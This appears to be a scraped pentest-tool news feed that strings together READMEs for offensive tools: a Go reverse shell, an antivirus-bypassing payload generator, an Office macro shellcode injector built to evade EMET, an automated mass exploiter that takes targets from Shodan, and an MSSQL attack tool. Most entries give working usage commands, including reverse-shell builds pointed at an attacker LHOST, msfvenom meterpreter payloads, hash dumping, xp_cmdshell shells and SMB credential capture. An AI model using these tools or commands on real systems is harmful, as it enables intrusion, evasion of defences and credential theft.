Hershell – Simple TCP reverse shell written in Go

Simple TCP reverse shell written in Go. It uses TLS to secure the communications, and provide a certificate public key fingerprint pinning feature, preventing from traffic interception.Supported OS are:WindowsLinuxMac OSFreeBSD and derivativesWhy ?Although meterpreter payloads are great, they are sometimes spotted by AV products.The goal of this project is to get a simple reverse shell, which can work on multiple systems,How ?Since it’s written in Go, you can cross compile the source for the desired architecture.Building the payloadTo simplify things, you can use the provided Makefile. You can set the following environment variables:GOOS : the target OSGOARCH : the target architectureLHOST : the attacker IP or domain nameLPORT : the listener portFor the GOOS and GOARCH variables, you can get the allowed values here.However, some helper targets are available in the Makefile:depends : generate the server certificate (required for the reverse shell)windows32 : builds a windows 32 bits executable (PE 32 bits)windows64 : builds a windows 64 bits executable (PE 64 bits)linux32 : builds a linux 32 bits executable (ELF 32 bits)linux64 : builds a linux 64 bits executable (ELF 64 bits)macos : builds a mac os 64 bits executable (Mach-O)For those targets, you just need to set the LHOST and LPORT environment variables.Using the shellOnce executed, you will be provided with a remote shell. This custom interactive shell will allow you to execute system commands through cmd.exe on Windows, or /bin/sh on UNIX machines.The following special commands are supported:run_shell : drops you an system shell (allowing you, for example, to change directories)inject : injects a shellcode (base64 encoded) in the same process memory, and executes it (Windows only at the moment)meterpreter IP:PORT : connects to a multi/handler to get a stage2 reverse tcp meterpreter from metasploit, and execute the shellcode in memory (Windows only at the moment)exit : exit gracefullyExamplesFirst of all, you will need to generate a valid certificate:$ make dependsopenssl req -subj ‘/CN=sysdream.com/O=Sysdream/C=FR’ -new -newkey rsa:4096 -days 3650 -nodes -x509 -keyout server.key -out server.pemGenerating a 4096 bit RSA private key…………………………………………………………………………++…..++writing new private key to ‘server.key’—–cat server.key >> server.pemFor windows:# Custom target$ make GOOS=windows GOARCH=amd64 LHOST= LPORT=1234# Predifined target$ make windows32 LHOST= LPORT=1234For Linux:# Custom target$ make GOOS=linux GOARCH=amd64 LHOST= LPORT=1234# Predifined target$ make linux32 LHOST= LPORT=1234For Mac OS X$ make macos LHOST= LPORT=1234ListenersOn the server side, you can use the openssl integrated TLS server:$ openssl s_server -cert server.pem -key server.key -accept 1234Using default temp DH parametersACCEPTbad gethostbyaddr—–BEGIN SSL SESSION PARAMETERS—–MHUCAQECAgMDBALALwQgsR3QwizJziqh4Ps3i+xHQKs9lvp5RfsYPWjEDB68Z4kEMHnP0OD99CHv2u27THKvCHCggKEpgrPnKH+vNGJGPJZ42QylfkekhSwY5Mtr5qYI5qEGAgRYgSfgogQCAgEspAYEBAEAAAA=—–END SSL SESSION PARAMETERS—–Shared ciphers:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-AES256-SHA:AES128-GCM-SHA256:AES256-GCM-SHA384:AES128-SHA:AES256-SHA:ECDHE-RSA-DES-CBC3-SHA:DES-CBC3-SHASignature Algorithms: RSA+SHA256:ECDSA+SHA256:RSA+SHA384:ECDSA+SHA384:RSA+SHA1:ECDSA+SHA1Shared Signature Algorithms: RSA+SHA256:ECDSA+SHA256:RSA+SHA384:ECDSA+SHA384:RSA+SHA1:ECDSA+SHA1Supported Elliptic Curve Point Formats: uncompressedSupported Elliptic Curves: P-256:P-384:P-521Shared Elliptic curves: P-256:P-384:P-521CIPHER is ECDHE-RSA-AES128-GCM-SHA256Secure Renegotiation IS supportedMicrosoft Windows [version 10.0.10586](c) 2015 Microsoft Corporation. Tous droits rservs.C:\Users\LAB2\Downloads>Or even better, use socat with its readline module, which gives you a handy history feature:$ socat readline openssl-listen:1234,fork,reuseaddr,verify=0,cert=server.pemMicrosoft Windows [version 10.0.10586](c) 2015 Microsoft Corporation. Tous droits rservs.C:\Users\LAB2\Downloads>Or, and this is great, use a metasploit handler:[][Sessions: 0][Jobs: 0]: > use exploit/multi/handler[][Sessions: 0][Jobs: 0]: exploit(handler) > set payload python/shell_reverse_tcp_sslpayload => python/shell_reverse_tcp_ssl[][Sessions: 0][Jobs: 0]: exploit(handler) > set lhost =>[][Sessions: 0][Jobs: 0]: exploit(handler) > set lport 4444lport => 4444[][Sessions: 0][Jobs: 0]: exploit(handler) > set handlersslcert /tmp/data/server.pemhandlersslcert => /tmp/data/server.pem[][Sessions: 0][Jobs: 0]: exploit(handler) > set exitonsession falseexitonsession => false[][Sessions: 0][Jobs: 0]: exploit(handler) > exploit -j[*] Exploit running as background job.[-] Handler failed to bind to[*] Started reverse SSL handler on[*] Starting the payload handler…[][Sessions: 0][Jobs: 1]: exploit(handler) >[*] Command shell session 1 opened ( -> at 2017-02-09 12:07:51 +0000[][Sessions: 1][Jobs: 1]: exploit(handler) > sessions -i 1[*] Starting interaction with 1…Microsoft Windows [version 10.0.10586](c) 2015 Microsoft Corporation. Tous droits rservs.C:\Users\lab1\Downloads>whoamiwhoamidesktop-jcfs2ok\lab1C:\Users\lab1\Downloads>CreditsRonan Kervella <r.kervella -at- sysdream -dot- com>Download Hershell

Link: http://feedproxy.google.com/~r/PentestTools/~3/ztyzWsKmaJ8/hershell-simple-tcp-reverse-shell.html

Remote NTLM relaying through meterpreter on Windows port 445

The hijacking of port 445 to perform relay attacks or hash capturing attacks has been a recurring topic for a while now. When you infect a target with meterpreter, how do you listen on port 445? A few weeks ago this topic resurfaced again in part due to Dirk-jan (@_dirkjan) that saw this question flying … Continue reading “Remote NTLM relaying through meterpreter on Windows port 445"

Link: http://diablohorn.com/2018/08/25/remote-ntlm-relaying-through-meterpreter-on-windows-port-445/

ASWCrypter – An Bash&Python Script For Generating Payloads that Bypasses All Antivirus

An Bash&Python Script For Generating Payloads that Bypasses All Antivirus so far [FUD].PLEASE DON’T UPLOAD BACKDOOT TO WWW.VIRUSTOTAL.COM ImportantThis Version Just for test , In future I will update ASWCrypter to generate a payloads for linux ,Mac and Windows . ;)Legal Disclamer:The author does not hold any responsibility for the bad use of this tool, remember this is only for educational purpose.Requirements1- Metasploit Framework 2- PythonGetting Startedgit clone https://github.com/AbedAlqaderSwedan1/ASWCrypter.gitcd ASWCrypterchmod +x setup.sh or chmod 777 setup.shScreenshotDownload ASWCrypter

Link: http://feedproxy.google.com/~r/PentestTools/~3/LBt2kOgRz1c/aswcrypter-bash-script-for-generating.html

wePWNise – Generates Architecture Independent VBA Code To Be Used In Office Documents Or Templates And Automates Bypassing Application Control And Exploit Mitigation Software

wePWNise is proof-of-concept Python script which generates VBA code that can be used in Office macros or templates. It was designed with automation and integration in mind, targeting locked down environment scenarios. The tool enumerates Software Restriction Policies (SRPs) and EMET mitigations and dynamically identifies safe binaries to inject payloads into. wePWNise integrates with existing exploitation frameworks (e.g. Metasploit, Cobalt Strike) and it also accepts any custom payload in raw format.PrerequisitesPython termcolor package. To install run: pip install termcolorCommand line argumentsTo start using wePWNise, first take a look at the options it supports:usage: wepwnise.py [-h] -i86 -i64 <x64_shellcode> [–inject64] [–out <output_file>] [–msgbox] [–msg <window_message>]optional arguments: -h, –help show this help message and exit -i86 <x86_shellcode> Input x86 raw shellcode -i64 <x64_shellcode> Input x64 raw shellcode –inject64 Inject into 64 Bit. Set to False when delivering x86 payloads only. Default is True –out <output_file> File to output the VBA macro to –msgbox Present messagebox to prevent automated analysis. Default is True. –msg <window_message> Custom message to present the victim if –msgbox is set to TruewePWNise requires both 32 and 64 bit raw payloads in order to be able to deliver the appropriate type when it lands on an unknown target. However, if only an x86 architecture is targeted, a dummy 64 bit payload must be provided to replace the missing code.In order to defeat certain automated analysis configurations, a message box opens upon execution of the code. The text of the message box can be altered by defining its value in the –msg parameter. To disable this functionality set the –msgbox parameter to False.Due to performance conditions that may be introduced as a result of long SRPs/EMET policies, wePWNise reads two configuration files (binary-paths.txt and directory-paths.txt) that contain a list of executables and directories which are less likely to be monitored to be checked first. By editing the contents of those files the user can define their own choices instead. If the files are empty, wePWNise will directly start reading the SPRs/EMET policies as these would be defined within the Registry and make its injection choice purely based on the retrieved information.Usage examplesThe following sections describe some basic usage examples of wePWNise.Metasploit payloadsFirst the payloads for both x86 and x64 architectures in raw format and ensure that the Metasploit listeners are configured appropriately.$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f raw -o /payloads/msf86.raw$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f raw -a x86_64 -o /payloads/msf64.rawThen point wePWNise to the generated payloads and direct the output to msf_wepwn.txt$ wepwnise.py -i86 /payloads/msf86.raw -i64 /payloads/msf64.raw –out /payloads/msf_wepwn.txtCobalt Strike payloadsTo generate a raw payload in Cobalt Strike, navigate to the following menu and from the Output dropdown select the Raw format. Repeat the process and enable the x64 checkbox to produce a 64-bit payload.Attacks > Packages > Payload GeneratorEnter the generated payloads into wePWNise to generate the VBA code.$ wepwnise.py -i86 /payloads/cs86.raw -i64 /payloads/cs64.raw –msgbox False –out /payloads/cs_wepwn.txtCustom payloadsIn certain cases it may be the case that only an x86 payload be available. As wePWNise expects both a 32-bit and 64-bit payloads, in order to disable 64-bit injection create a dummy 64-bit file and set the –inject64 parameter to False.$ echo “+" > /payloads/dummy64.raw$ wepwnise.py -i86 /payloads/custom.raw -i64 /payloads/dummy64.raw –inject64 False –out /payloads/wepwn86.txtSimilarly, to generate 64-bit payloads only, create a dummy x86 file and supply it in wePWNise’s -i86 command line paramenter.Download wePWNise

Link: http://feedproxy.google.com/~r/PentestTools/~3/xnUJEXNmLbQ/wepwnise-generates-architecture.html

AutoSploit v2.2 – Automated Mass Exploiter

As the name might suggest AutoSploit attempts to automate the exploitation of remote hosts. Targets can be collected automatically through Shodan, Censys or Zoomeye. But options to add your custom targets and host lists have been included as well. The available Metasploit modules have been selected to facilitate Remote Code Execution and to attempt to gain Reverse TCP Shells and/or Meterpreter sessions. Workspace, local host and local port for MSF facilitated back connections are configured by filling out the dialog that comes up before the exploit component is startedOperational Security ConsiderationReceiving back connections on your local machine might not be the best idea from an OPSEC standpoint. Instead consider running this tool from a VPS that has all the dependencies required, available.The new version of AutoSploit has a feature that allows you to set a proxy before you connect and a custom user-agent.Helpful linksUsageInstallingDependenciesUser Manual Extensive usage breakdownScreenshotsReporting bugs/ideasDevelopment guidelinesShoutoutsDevelopmentDiscord serverREADME translationsInstallationInstalling AutoSploit is very simple, you can find the latest stable release here. You can also download the master branch as a zip or tarball or follow one of the below methods;Cloningsudo -s << EOFgit clone https://github.com/NullArray/Autosploit.gitcd AutoSploitchmod +x install.sh./install.shpython2 autosploit.pyEOFDockersudo -s << EOFgit clone https://github.com/NullArray/AutoSploit.gitcd AutoSploitchmod +x install.sh./installshcd AutoSploit/Dockerdocker network create -d bridge haknetdocker run --network haknet --name msfdb -e POSTGRES_PASSWORD=s3cr3t -d postgresdocker build -t autosploit .docker run -it --network haknet -p 80:80 -p 443:443 -p 4444:4444 autosploitEOFOn any Linux system the following should work;git clone https://github.com/NullArray/AutoSploitcd AutoSploitchmod +x install.sh./install.shIf you want to run AutoSploit on a macOS system, AutoSploit is compatible with macOS, however, you have to be inside a virtual environment for it to run successfully. To do this, do the following;sudo -s << '_EOF'pip2 install virtualenv --usergit clone https://github.com/NullArray/AutoSploit.gitvirtualenv <PATH-TO-YOUR-ENV>source <PATH-TO-YOUR-ENV>/bin/activatecd <PATH-TO-AUTOSPLOIT>pip2 install -r requirements.txtchmod +x install.sh./install.shpython autosploit.py_EOFMore information on running Docker can be found hereUsageStarting the program with python autosploit.py will open an AutoSploit terminal session. The options for which are as follows.1. Usage And Legal2. Gather Hosts3. Custom Hosts4. Add Single Host5. View Gathered Hosts6. Exploit Gathered Hosts99. QuitChoosing option 2 will prompt you for a platform specific search query. Enter IIS or Apache in example and choose a search engine. After doing so the collected hosts will be saved to be used in the Exploit component.As of version 2.0 AutoSploit can be started with a number of command line arguments/flags as well. Type python autosploit.py -h to display all the options available to you. I’ve posted the options below as well for reference.usage: python autosploit.py -[c|z|s|a] -[q] QUERY [-C] WORKSPACE LHOST LPORT [-e] [–whitewash] PATH [–ruby-exec] [–msf-path] PATH [-E] EXPLOIT-FILE-PATH [–rand-agent] [–proxy] PROTO://IP:PORT [-P] AGENToptional arguments: -h, –help show this help message and exitsearch engines: possible search engines to use -c, –censys use censys.io as the search engine to gather hosts -z, –zoomeye use zoomeye.org as the search engine to gather hosts -s, –shodan use shodan.io as the search engine to gather hosts -a, –all search all available search engines to gather hostsrequests: arguments to edit your requests –proxy PROTO://IP:PORT run behind a proxy while performing the searches –random-agent use a random HTTP User-Agent header -P USER-AGENT, –personal-agent USER-AGENT pass a personal User-Agent to use for HTTP requests -q QUERY, –query QUERY pass your search queryexploits: arguments to edit your exploits -E PATH, –exploit-file PATH provide a text file to convert into JSON and save for later use -C WORKSPACE LHOST LPORT, –config WORKSPACE LHOST LPORT set the configuration for MSF (IE -C default 8080) -e, –exploit start exploiting the already gathered hostsmisc arguments: arguments that don’t fit anywhere else –ruby-exec if you need to run the Ruby executable with MSF use this –msf-path MSF-PATH pass the path to your framework if it is not in your ENV PATH –whitelist PATH only exploit hosts listed in the whitelist fileIf you want to run AutoSploit on a macOS system, AutoSploit is compatible with macOS, however, you have to be inside a virtual environment for it to run successfully. To do this, do the following;sudo -s << ‘_EOF’ pip2 install virtualenv –usergit clone https://github.com/NullArray/AutoSploit.gitvirtualenv <PATH-TO-YOUR-ENV>source <PATH-TO-YOUR-ENV>/bin/activatecd <PATH-TO-AUTOSPLOIT>pip2 install -r requirements.txtchmod +x install.sh./install.shpython autosploit.py_EOFDependenciesNote: All dependencies should be installed using the above installation method, however, if you find they are not:AutoSploit depends on the following Python2.7 modules.requestspsutilShould you find you do not have these installed get them with pip like so.pip install requests psutilorpip install -r requirements.txtSince the program invokes functionality from the Metasploit Framework you need to have this installed also. Get it from Rapid7 by clicking here.Download AutoSploit v2.2

Link: http://feedproxy.google.com/~r/PentestTools/~3/ZT_17-GzAcc/autosploit-v22-automated-mass-exploiter.html

UPDATED VERSION: RouterSploit 3.3.0

PenTestIT RSS Feed
Since my last update, this router exploitation framework have gone through a lot of updates. This post is about RouterSploit 3.3.0 code named I Know You Were Trouble. We will also discuss changes made to and an earlier version 3.2.0 to maintain a chain with the hopes that I keep a watch on these coolRead more about UPDATED VERSION: RouterSploit 3.3.0
The post UPDATED VERSION: RouterSploit 3.3.0 appeared first on PenTestIT.

Link: http://pentestit.com/updated-version-routersploit-3-3-0/


PenTestIT RSS Feed
It has been some days since there was a lot of hue and cry about AutoSploit and eventually everything subsided. I wrote about it in a post titledAutoSploit = Shodan/Censys/Zoomeye + Metasploit too. Recently, an updated an improved updated version – AutoSploit 2.2 was released. This post will try to describe the changes between theRead more about UPDATED VERSION: AutoSploit 2.2
The post UPDATED VERSION: AutoSploit 2.2 appeared first on PenTestIT.

Link: http://feedproxy.google.com/~r/PenTestIT/~3/1YYxIzm27jk/

Sn1per v5.0 – Automated Pentest Recon Scanner

Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security’s premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes.SN1PER PROFESSIONAL FEATURES:Professional reporting interfaceSlideshow for all gathered screenshotsSearchable and sortable DNS, IP and open port databaseCategorized host reportsQuick links to online recon tools and Google hacking queriesPersonalized notes field for each hostDEMO VIDEO:SN1PER COMMUNITY FEATURES: Automatically collects basic recon (ie. whois, ping, DNS, etc.) Automatically launches Google hacking queries against a target domain Automatically enumerates open ports via NMap port scanning Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers Automatically checks for sub-domain hijacking Automatically runs targeted NMap scripts against open ports Automatically runs targeted Metasploit scan and exploit modules Automatically scans all web applications for common vulnerabilities Automatically brute forces ALL open services Automatically test for anonymous FTP access Automatically runs WPScan, Arachni and Nikto for all web services Automatically enumerates NFS shares Automatically test for anonymous LDAP access Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities Automatically enumerate SNMP community strings, services and users Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067 Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers Automatically tests for open X11 servers Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds Performs high level enumeration of multiple hosts and subnets Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting Automatically gathers screenshots of all web sites Create individual workspaces to store all scan outputAUTO-PWN:Drupal Drupalgedon2 RCE CVE-2018-7600GPON Router RCE CVE-2018-10561Apache Struts 2 RCE CVE-2017-5638Apache Struts 2 RCE CVE-2017-9805Apache Jakarta RCE CVE-2017-5638Shellshock GNU Bash RCE CVE-2014-6271HeartBleed OpenSSL Detection CVE-2014-0160Default Apache Tomcat Creds CVE-2009-3843MS Windows SMB RCE MS08-067Webmin File Disclosure CVE-2006-3392Anonymous FTP AccessPHPMyAdmin Backdoor RCEPHPMyAdmin Auth BypassJBoss Java De-Serialization RCE’sKALI LINUX INSTALL:./install.shDOCKER INSTALL:Credits: @menzowDocker Install: https://github.com/menzow/sn1per-dockerDocker Build: https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/Example usage:$ docker pull menzo/sn1per-docker$ docker run –rm -ti menzo/sn1per-docker sniper menzo.ioUSAGE:[*] NORMAL MODEsniper -t|–target [*] NORMAL MODE + OSINT + RECONsniper -t|–target <TARGET> -o|–osint -re|–recon[*] STEALTH MODE + OSINT + RECONsniper -t|–target <TARGET> -m|–mode stealth -o|–osint -re|–recon[*] DISCOVER MODEsniper -t|–target <CIDR> -m|–mode discover -w|–workspace <WORSPACE_ALIAS>[*] SCAN ONLY SPECIFIC PORTsniper -t|–target <TARGET> -m port -p|–port <portnum>[*] FULLPORTONLY SCAN MODEsniper -t|–target <TARGET> -fp|–fullportonly[*] PORT SCAN MODEsniper -t|–target <TARGET> -m|–mode port -p|–port <PORT_NUM>[*] WEB MODE – PORT 80 + 443 ONLY!sniper -t|–target <TARGET> -m|–mode web[*] HTTP WEB PORT MODEsniper -t|–target <TARGET> -m|–mode webporthttp -p|–port <port>[*] HTTPS WEB PORT MODEsniper -t|–target <TARGET> -m|–mode webporthttps -p|–port <port>[*] ENABLE BRUTEFORCEsniper -t|–target <TARGET> -b|–bruteforce[*] AIRSTRIKE MODEsniper -f|–file /full/path/to/targets.txt -m|–mode airstrike[*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLEDsniper -f–file /full/path/to/targets.txt -m|–mode nuke -w|–workspace <WORKSPACE_ALIAS>[*] ENABLE LOOT IMPORTING INTO METASPLOITsniper -t|–target <TARGET>[*] LOOT REIMPORT FUNCTIONsniper -w <WORKSPACE_ALIAS> –reimport[*] UPDATE SNIPERsniper -u|–updateMODES:NORMAL: Performs basic scan of targets and open ports using both active and passive checks for optimal performance.STEALTH: Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.AIRSTRIKE: Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.NUKE: Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.DISCOVER: Parses all hosts on a subnet/CIDR (ie. and initiates a sniper scan against each host. Useful for internal network scans.PORT: Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.FULLPORTONLY: Performs a full detailed port scan and saves results to XML.WEB: Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.WEBPORTHTTP: Launches a full HTTP web application scan against a specific host and port.WEBPORTHTTPS: Launches a full HTTPS web application scan against a specific host and port.UPDATE: Checks for updates and upgrades all components used by sniper.REIMPORT: Reimport all workspace files into Metasploit and reproduce all reports.RELOAD: Reload the master workspace report.SAMPLE REPORT:https://gist.github.com/1N3/8214ec2da2c91691bcbcDownload Sn1per v5.0

Link: http://feedproxy.google.com/~r/PentestTools/~3/Z_yHqaJ_y1U/sn1per-v50-automated-pentest-recon.html

MSDAT – Microsoft SQL Database Attacking Tool

MSDAT (Microsoft SQL Database Attacking Tool) is an open source penetration testing tool that tests the security of Microsoft SQL Databases remotely.Usage examples of MSDAT:You have a Microsoft database listening remotely and you want to find valid credentials in order to connect to the databaseYou have a valid Microsoft SQL account on a database and you want to escalate your privilegesYou have a valid Microsoft SQL account and you want to execute commands on the operating system hosting this DB (xp_cmdshell)Tested on Microsof SQL database 2005, 2008 and 2012.ChangelogVersion 1.0 (2017/02/15) :first version realeasedFeaturesThanks to MSDAT (Microsoft SQL Database Attacking Tool), you can:get technical information (ex: database version) of a MSSQL database without to be authenticatedsearch MSSQL accounts with a dictionnary attacktest each login as password (authentication required)get a windows shell on the database server withxp_cmdshelldownload files remotely with:OLE Automationbulkinsertopenrowsetupload files on the server with:OLE Automationopenrowsetcapture a SMB authentication thanks to:bulkinsertopenrowsetxp_dirtreexp_fileexistxp-getfiledetailssteal MSSQL hashed password, on an any MSSQL versionscan ports through the database:openrowsetexecute SQL requests on a remote MSSQL server trough the database (target) with:bulkinsertopenrowsetlist files/directories with:xp_subdirsxp_dirtreelist drives/medias with:xp_fixeddrivesxp_availablemediacreate folder with:xp_create_subdirInstallationSome dependancies must be installed in order to run MSDAT.In ubuntu:sudo apt-get install freetds-dev or download freetds on http://www.freetds.org/sudo pip install cython colorlog termcolor pymssql argparsesudo pip install argcomplete && sudo activate-global-python-argcompleteAdd “use ntlmv2 = yes" in your freetds configuration file (ex: /etc/freetds/freetds.conf or /usr/local/etc/freetds.conf). Example:[global] # TDS protocol version tds version = 8.0 use ntlmv2 = yesExamplesModulesYou can list all modules:./msdat.py -hWhen you have chosen a module (example: all), you can use it and you can list all features and options of the module:./msdat.py all -hYou can know if a specific module can be used on a MSSQL server thanks to the –test-module option. This options is implemented in each mdat module.all moduleThe all module allows you to run all modules (depends on options that you have purchased).python msdat.py all -s $SERVERIf you want:to use your own account file for the dictionnary attacktry multiple passwords for a user without ask youto define your own timeout value./msdat.py all -s $SERVER -p $PORT –accounts-file accounts.txt –login-timeout 10 –force-retryIn each module, you can define the charset to use with the –charset option.mssqlinfo moduleTo get technical information about a remote MSSQL server without to be authenticated:./msdat.py mssqlinfo -s $SERVER -p $PORT –get-max-infoThis module uses TDS protocol and SQL browser Server to get information.passwordguesser moduleThis module allows you to search valid credentials :./msdat.py passwordguesser -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –force-retry –search–force-retry option allows to test multiple passwords for each user without ask youYou can specify your own account file with the –accounts-file option:./msdat.py passwordguesser -s $SERVER -p $PORT –search –accounts-file accounts.txt –force-retrypasswordstealer moduleTo dump hashed passwords :./msdat.py passwordstealer -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –dump –save-to-file test.txtThis modules has been tested on SQL Server 2000, 2005, 2008 and 2014.xpcmdshell moduleTo execute system commands thanks to xp_cmdshell (https://msdn.microsoft.com/en-us/library/ms190693.aspx):./msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD –shellThis previous command give you an interactive shell on the remote database server.If xp_cmdshell is not enabled, the –enable-xpcmdshell can be used in this module to activate it:./msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD –enable-xpcmdshell –disable-xpcmdshell –disable-xpcmdshell –shellThe –enable-xpcmdshell option enables xp_cmdshell if it is not enabled (not enabled by default).The –disable-xpcmdshell option disables xp_cmdshell if this one is enabled.smbauthcapture moduleThanks to this module, you can capture a SMB authentication:./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –capture $MY_IP_ADDRESS –share-name SHARETo capture the SMB authentication, the auxiliary/server/capture/smb (http://www.rapid7.com/db/modules/auxiliary/server/capture/smb) module of metasploit could be used:msf > use auxiliary/server/capture/smbmsf auxiliary(smb) > exploitThe capture command of this module tries to capture a SMB authentication thanks to xp_dirtree, xp_fileexist or xp-getfiledetails procedure.If you want to choose the SMB authentication procedure to capture the authentication:./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD –xp-dirtree-capture smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD –xp-fileexist-capture smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD –xp-getfiledetails-capture can change the SHARE name with the –share-name option.oleautomation moduleThis module can be used to read/write file in the database server.The following command read the file temp.txt stored in the database server:./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –read-file ‘C:\Users\Administrator\Desktop\temp.txt’To write a string in a file (temp.txt) remotely:./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –write-file ‘C:\Users\Administrator\Desktop\temp.txt’ ‘a\nb\nc\nd\ne\nf’This module can be used to download a file (C:\Users\Administrator\Desktop\temp.txt) stored on the database server:./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –get-file ‘C:\Users\Administrator\Desktop\temp.txt’ temp.txtAlso, you can use this module to upload a file (temp.txt) on the target:./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –put-file temp.txt ‘C:\Users\Administrator\Desktop\temp.txtbulkopen moduleThe module bulkopen can be used :to read/download files stored on a database serverto scan ports through the database serverto execute SQL requests on a remote MSSQL server through the databaseTo read a file stored in the target, the following command can be used:./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –read-file ‘C:\Users\Administrator\Desktop\temp.txt’"The –method option can be used to specify the method to use:bulkinsert (https://msdn.microsoft.com/en-us/library/ms188365.aspx) oropenrowset(https://msdn.microsoft.com/en-us/library/ms190312.aspx)):./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –read-file ‘C:\Users\Administrator\Desktop\temp.txt’ –method openrowsetTo download a file (C:\Users\Administrator\Desktop\temp.txt):` “bash ./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –get-file ‘C:\Users\Administrator\Desktop\temp.txt’ temp.txtThis module can be used to scan ports (1433 and 1434 of through the database server:“`bash./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –scan-ports 1433,1434 -vYou can scan a range of ports:./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –scan-ports 1433-1438This module can be used to execute SQL requests (ex: select @@ServerName) on a remote database server (ex: $SERVER2) through the database ($SERVER):./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –request-rdb $SERVER2 $PORT $DATABASE $USER $PASSWORD ‘select @@ServerName’xpdirectory moduleThe module xpdirectory can be used:to list:filesdirectoriesdrivesto check if a file existsto create a directoryTo list files in a specific directory:./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –list-files ‘C:\’To list directories in a specific directory:./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –list-dir ‘C:\’To list drives:./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –list-fixed-drives –list-available-mediaTo check if a file exist:./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –file-exists ‘C:\’ –file-exists ‘file.txt’To create a directory:./msdat.py xpdirectory –s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –create-dir ‘C:\temp’search moduleThe module search can be used to search a pattern in column names of tables and views. Usefull to search the pattern %password% in column names for example.To get column names which contains password patterns (ex: passwd, password, motdepasse, clave):./msdat.py search -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –pwd-column-names –show-empty-columnsIf you want to see column names which doesn’t contain a data, you should use the option –show-empty-columns.To search a specific pattern in column names of views and tables:./msdat.py search -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –pwd-column-names –show-empty-columnsDownload MSDAT

Link: http://feedproxy.google.com/~r/PentestTools/~3/ZIGtMzYR_7Q/msdat-microsoft-sql-database-attacking.html